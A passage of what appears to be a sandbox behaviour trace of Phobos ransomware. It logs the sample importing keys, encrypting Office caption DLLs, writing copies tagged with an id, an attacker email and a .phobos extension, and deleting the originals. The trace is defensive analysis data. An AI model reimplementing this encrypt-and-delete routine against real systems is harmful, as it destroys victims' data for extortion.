(normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0166.452] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=52576) returned 1 [0166.452] CloseHandle (hObject=0x194) returned 1 [0166.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll")) returned 0x2020 [0166.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.453] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0166.453] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.453] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.453] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.453] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0166.453] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.453] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xcd60, lpOverlapped=0x0) returned 1 [0166.473] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xcd70, dwBufLen=0xcd70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xcd70) returned 1 [0166.473] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xcd70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xcd70, lpOverlapped=0x0) returned 1 [0166.476] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ba8) returned 1 [0166.476] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.476] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0166.476] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.476] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0166.476] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.476] CloseHandle (hObject=0x194) returned 1 [0166.476] CloseHandle (hObject=0x14c) returned 1 [0166.476] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll")) returned 1 [0166.477] SetEvent (hEvent=0xe8) returned 1 [0166.477] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0166.477] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.482] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=286560) returned 1 [0166.482] CloseHandle (hObject=0x14c) returned 1 [0166.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll")) returned 0x2020 [0166.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.483] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.483] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0166.483] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0166.483] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.483] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x45f60, lpOverlapped=0x0) returned 1 [0166.560] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x45f70, dwBufLen=0x45f70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x45f70) returned 1 [0166.563] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x45f70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x45f70, lpOverlapped=0x0) returned 1 [0166.567] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0166.567] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.567] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0166.567] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.567] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0166.567] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.567] CloseHandle (hObject=0x14c) returned 1 [0166.567] CloseHandle (hObject=0x194) returned 1 [0166.567] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll")) returned 1 [0166.571] SetEvent (hEvent=0xe8) returned 1 [0166.571] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0166.571] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0166.571] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=581984) returned 1 [0166.571] CloseHandle (hObject=0x194) returned 1 [0166.571] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll")) returned 0x2020 [0166.571] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.571] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0166.571] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.571] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.571] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0166.572] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.572] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x8e160, lpOverlapped=0x0) returned 1 [0166.738] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8e170, dwBufLen=0x8e170 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8e170) returned 1 [0166.743] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x8e170, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x8e170, lpOverlapped=0x0) returned 1 [0166.752] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32da8) returned 1 [0166.752] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.752] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0166.752] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.752] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0166.752] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.752] CloseHandle (hObject=0x194) returned 1 [0166.752] CloseHandle (hObject=0x14c) returned 1 [0166.752] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll")) returned 1 [0166.764] SetEvent (hEvent=0xe8) returned 1 [0166.765] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0166.765] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.765] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=16736) returned 1 [0166.765] CloseHandle (hObject=0x14c) returned 1 [0166.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll")) returned 0x2020 [0166.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.765] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.765] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.765] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.765] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0166.766] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0166.766] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.766] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4160, lpOverlapped=0x0) returned 1 [0166.771] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4170, dwBufLen=0x4170 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4170) returned 1 [0166.771] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4170, lpOverlapped=0x0) returned 1 [0166.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32da8) returned 1 [0166.772] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.773] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0166.773] CryptDestroyKey (hKey=0xa32da8) returned 1 [0166.773] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0166.773] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.773] CloseHandle (hObject=0x14c) returned 1 [0166.773] CloseHandle (hObject=0x194) returned 1 [0166.773] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll")) returned 1 [0166.774] SetEvent (hEvent=0xe8) returned 1 [0166.774] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0166.774] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0166.774] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=488800) returned 1 [0166.774] CloseHandle (hObject=0x194) returned 1 [0166.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll")) returned 0x2020 [0166.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.774] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0166.775] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.775] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.775] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.777] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0166.777] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.777] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x77560, lpOverlapped=0x0) returned 1 [0167.328] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x77570, dwBufLen=0x77570 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x77570) returned 1 [0167.332] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x77570, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x77570, lpOverlapped=0x0) returned 1 [0167.339] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0167.339] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0167.339] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0167.339] CryptDestroyKey (hKey=0xa32c68) returned 1 [0167.339] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0167.339] CryptDestroyKey (hKey=0xa327e8) returned 1 [0167.339] CloseHandle (hObject=0x194) returned 1 [0167.339] CloseHandle (hObject=0x14c) returned 1 [0167.339] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll")) returned 1 [0167.343] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0167.343] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0167.344] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=152416) returned 1 [0167.344] CloseHandle (hObject=0x14c) returned 1 [0167.344] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll")) returned 0x2020 [0167.344] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.344] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0167.344] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0167.344] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 